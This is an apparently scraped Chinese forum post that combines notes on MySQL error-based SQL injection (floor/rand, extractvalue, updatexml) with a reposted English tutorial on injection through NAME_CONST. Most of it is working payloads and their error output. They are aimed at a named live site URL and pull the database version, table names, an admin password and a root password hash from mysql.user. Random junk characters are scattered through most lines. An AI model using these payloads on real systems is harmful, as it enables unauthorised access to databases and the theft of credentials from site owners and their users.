|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:$ [! o5 z/ y/ D9 o
首先进行正常查询: mysql> select * from article where id = 1;
, _/ B: m; F- [7 o9 l3 `+—-+——-+———+/ K# G' p+ a) N: G
| id | title | content |' {& _& O, U: s$ H
+—-+——-+———+' i) u) K; b8 h+ f$ x. ~
| 1 | test | do it |$ z9 O) F* k# R. ^- J2 R( I
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
+ X& c. P _" Y1 M9 t) |0 yERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。# ?" j9 X; p5 p: N; i
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);: I" t& _/ b% D) b& b' ~& t$ J; P! W
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
% o a. ^( a! L$ L( l$ b3 V( d; {ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue' F- p) o1 ?: U F8 M
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
" B% x% h3 U( N/ x# mERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ ) B& Q/ v0 X6 M: Y
* ~0 _5 Z* N* J. g! `3 ]1 Z7 Q- b
再收集:
! y' [+ t$ M' s0 {& c7 ?' R/ T2 ghttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
# p: h. M' E& r2 S m
1 t! f" w( i& e. v, }# DError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’/ U( J$ h! N7 r9 q
; O$ M6 n) \, E
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
6 }( J" D& E% I% T1 b! H
; Z, R; b" ?) l f: Y: ^% ^Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ + o2 ?* k ~8 {
4 o8 s- M* X, t, N# {3 l- S' _MYSQL高版本报错注入技巧-利用NAME_CONST注入
! E( ]/ E! F+ s5 B7 x( _/ b5 CIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
& o7 {! F- x/ {! Q! \% F) A" u, H/ v: L: H# d3 M0 _
) ]% c) D" K; I$ J/ R
相关信息
% E& H7 X- s2 A& T2 p: W( w9 e7 |3 {* W
& c4 j9 D. l6 ^* g- pNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.3 V6 S0 C' `9 G5 ^6 n
) s0 y% y+ t' G* c4 W- n; d
Code:5 F' x2 {" n0 W
NAME_CONST(DATA, VALUE)
" z9 h: Y8 x6 a8 f, [0 v8 o' E5 m, t
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.8 F _2 a2 R- [" Z Q% u% m M
) e% | H \ h) K9 X* wSELECT NAME_CONST('TEST', 1), K3 C9 D7 q( E! u
% j4 h5 C: a0 H
$ V2 J7 f" N9 A) l/ S4 Y' w
! F! |9 u# E# K) o$ `|---------------|
" Q+ q6 w: D8 ]0 `) I9 F| TEST |- ?; [7 f( }% G7 c
| |' L- U. z/ G$ U5 O
|---------------|4 {6 W, \. [+ {8 l5 `( y% {
| 1 |) ]* Y0 g. F6 S! n) P% k! u! x) V
| |
$ J7 x5 x( l; T- ?* U|---------------|+ c* K3 }) N- @: B
% I& N* Z) ^/ _% ?& a9 T. w: p: q3 M# P* Q v
7 R3 b; J% E! I4 _* f
+ _- a/ k# R6 G7 phttp://dev.mysql.com/doc/refman/5.0/en/m...name-const' n0 v$ u1 p% z- T5 ?; b
Intro to MySQL Variables
$ X, ?4 `8 ?) X k
1 j( i6 }' p' [0 P# C8 rOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST. T! ~9 V9 s* m9 y: S- w* j6 J9 F) y- Y7 o
! q) @- E' M+ f% O# B
Code:
( a# v8 Y$ P4 W( G" Zhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
$ R# K9 Z, i, O# U/ U! ` ~) \8 m. m* i, u/ h. W
# M1 W3 }* K/ Z1 N/ \/ n/ R2 i
8 }- K: x9 {6 j. n* y3 g7 w, G( ?7 R* C" i1 a5 x/ x8 p
: Z- W# _$ y* ~
Code:4 I& A, ?+ ` A9 n u* h+ H6 ^
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
% q4 g7 }! c7 h* ?: V4 H" W+ I$ C
0 H( y9 M7 B# S! t( c
9 c. q6 ~1 F1 S( N; K9 b3 ^' H9 xVAR = Your MySQL variable.% F# u4 w; [' ?/ E. w8 `
3 A M/ E6 ^) X2 {+ p" o+ J
MySQL 5.1.3 Server System Variables
" S! F* V7 D( h# F! s+ d$ ~3 S& m5 P2 _1 y; q
Let's try it out on my site..
|1 L2 [% @5 T& \5 [
1 w7 V# k# v5 j+ [+ a1 ICode:
9 g; M& G6 u' L. G) r1 l; Bhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
& m! }9 I* Y! x y& }( F! f. |) z+ M1 q
Erroruplicate column name '5.0.27-community-nt'
9 C4 `( T, k0 C* Y" B. I' w
- a9 q9 |+ i* {( ~3 g2 u# u! h
6 R9 u. B. e- v8 D! u8 s9 i; b1 {9 O* l; R( ]! q
5 l/ k# F t" c2 w: ?( P$ INow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
3 [3 l+ _" y+ W2 R
" @$ K2 E" t8 h% w6 U% i/ iData Extraction
R4 L/ s3 X% I: i2 R" i" h9 {# j% @5 ^/ n" u' T
Code:1 L0 S6 z4 ]) R+ ~
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--; V! d' d: b; t# U$ h# [
( W+ F+ \: }, b6 ^% y2 x) z/ U5 v7 d) j
6 z) T; X7 ]: t7 b/ H
We should get a duplicate column 1 error...
$ L! H. f, y; \2 j
1 F b9 N% y- V& n5 ^8 ?Code:
3 U( Z N! i3 o/ ~: a- h {) U# ihttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
3 z# F) I4 ~7 E+ l
$ A, c$ r0 ]1 Z' o$ p" J5 UErroruplicate column name '1* y5 {% K* j& B$ U# a/ s! {
0 u* m1 O& {* t$ N Q( Z
0 i& B- m: m; E
; @$ w7 h5 e+ L+ n$ J
- d8 ]: o0 Y! {* e6 T# p! M- m
8 h3 z9 s6 g# a* n; `( ` G! ^/ ~) k6 f- L4 t
Now let's get the tables out this bitch..
# h- I4 `0 V& ^$ x0 _2 W2 S5 |/ t' y+ }1 o) Y9 U. a9 @8 O
Code:" m+ V2 E% o0 ]) ^4 m
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
/ ]. m% j5 k) h C6 D
' e; ]( H3 U9 K( L
# {1 {: w- ?) j& OLet's see if it works here, if it does, we can go on and finish the job.& D& j3 O# b( N' n Y s/ H, c
; l; R3 H0 Y7 [) z* ]5 c$ M% p
Code:) c5 f: B9 @% s" J; G
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
9 b2 M: {% a8 y
# V$ C8 b0 z; a, j# g) i/ D$ Z: D2 ]+ B* i& ~0 u, b) O
Erroruplicate column name 'com_admanage
, K& V* F/ @7 u; ^
- g* B8 ]/ [2 N5 {1 O6 I: F. ?( D8 `, D
" c- |( _* |' S* o. U
% c# n% I. O+ H8 `, |: q
" K2 q8 t# ^5 I& N \( Y" g) [: e4 | j! N! [
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
8 j/ [( G- H/ M, Z3 ]3 @" W: ?3 g9 y) z
Let's get the columns out of the user table..
5 I8 K2 Z5 x* ?' p1 ^. L4 h6 C
& P2 R2 Z, k" E6 m7 fCode:7 \& r) v% P% y3 [# @% W* w
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
5 f5 z: n/ l. n& ~( e, i
" J+ Y; O* x F" o0 y6 D- O3 q2 F$ }
So mine looks like this, and I get the duplicate column name 'Host'.
9 [& h+ \' ?; ^0 t2 z# B+ I2 v
; I' m, R, o' p! CCode:
( ^) J" M/ ?4 s4 a& lhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--$ c7 i7 i6 X" a4 _. Q2 n) x
. O: r0 N0 ^( W! [3 p; eErroruplicate column name 'Host'6 N8 U* f5 M" ^4 P$ W- Y- m
* E8 t9 ?' X8 u o1 E2 C/ H1 T9 C' ? {7 I+ C% Y3 x
1 o* Z' I' r# U! N7 I7 |( ]
# W" R( g6 r3 s% s* w8 X9 N% u
( F( C3 A& g5 N1 o: }7 W$ F+ r l6 x* T; c% @% q( W
Woot, time to finish this bitch off.
% i: H: U% z: u0 l9 F9 S! Q# ?, ~: O0 S, y# r4 P0 A4 N
Code:
) b/ E+ G$ e) p* L3 l$ u+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
, C/ K" h, A8 a4 ^ d; r
1 E" N% u- |! t/ `. M, X* l4 v
. r3 C% O# [6 e' a- aSo mine looks like this...
+ [/ U! \( X+ W6 h5 r; W" l- i2 Q- ^2 x" l% o+ u U- j0 X
Code:! t7 q+ }5 l$ I( z! N* h
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--4 K+ k$ ]% K! u* V6 ^; w# U( A
; _: `$ i/ L6 t
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'% n7 O& @) `3 U2 ?8 _) Z
) n# d7 O$ i% ^( i& X+ `7 }: O
, d- o: l7 v* m& H" F
( z( U) E$ _5 @ z$ N4 ~' I: H! d( V9 d3 k# ]3 i) P2 f5 \, K
8 P9 I {7 g/ F# s- k5 S
* ~7 m' t' a. L2 x$ U- L" `0 {
And there we have it, thanks for reading.
* h, Q9 M4 |& }8 j: F
/ G. V' Y c! x4 z |
发表于 2015-11-11 19:03:37
收藏
支持
反对